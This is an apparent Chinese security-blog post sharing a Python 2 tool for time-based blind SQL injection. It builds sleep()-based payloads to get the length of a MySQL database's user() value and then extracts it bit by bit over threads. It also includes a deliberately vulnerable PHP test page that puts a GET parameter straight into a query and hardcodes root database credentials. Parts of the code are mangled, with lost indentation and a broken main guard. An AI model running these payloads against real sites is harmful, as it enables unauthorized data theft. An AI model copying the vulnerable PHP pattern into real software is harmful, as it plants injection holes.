延迟注入工具(Python脚本)

  • 内容
  • 相关

延迟注入工具(python)


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests
class my_threading(threading.Thread):
    def __init__(self, str,x):
        threading.Thread.__init__(self)
        self.str = str
        self.x = x
    def run(self):
      global res
      x=self.x
      j = self.str
      url = "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
      html = request(url)
      verify = 'timeout'
      if verify not in html:
        res[str(j)] = 0
        #print 1
      else:
        res[str(j)] = 1
def request(URL):

user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }

req = urllib2.Request(URL, None, user_agent)

try:

request = urllib2.urlopen(req,timeout=2)

except Exception ,e:

time.sleep(2)

return 'timeout'

return request.read()

def curl(url):

try:

start = time.clock()

requests.get(url)

end = time.clock()

return int(end)

except requests.RequestException as e:

print u"访问出错!"

exit()

def getLength():

i = 0

while True:

print "[+] Checking: %s \r" %i

url = "http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"

html = request(url)

verify = 'timeout'

if verify in html:

print u"[+] 数据长度为: %s" %i

return i

i = i + 1

def bin2dec(string_num):

return int(string_num, 2)

def getData(dataLength):

global res

data = ""

for x in range(dataLength):

x = x + 1

#print x

threads = []

for j in range(8):

result = ""

j = j + 1

sb = my_threading(j,x)

sb.setDaemon(True)

threads.append(sb)

#print j

for t in threads:

t.start()

for t in threads:

t.join()

#print res

tmp = ""

for i in range(8):

tmp = tmp + str(res[str(i+1)])

#print chr(bin2dec(tmp))

res = {}

result = chr(bin2dec(tmp))

print result

data = data + result

sb = None

print "[+] ok!"

print "[+] result:" + data


if name == 'main':

stop = False

res = {}

length = getLength()

getData(length)
可以搞一定复杂的环境
php脚本 修改一下


<?php
/*
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","123456");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "123123123";
?>
点击访问原文

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:延迟注入工具(Python脚本) - https://www.0dayhack.com/post-673.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注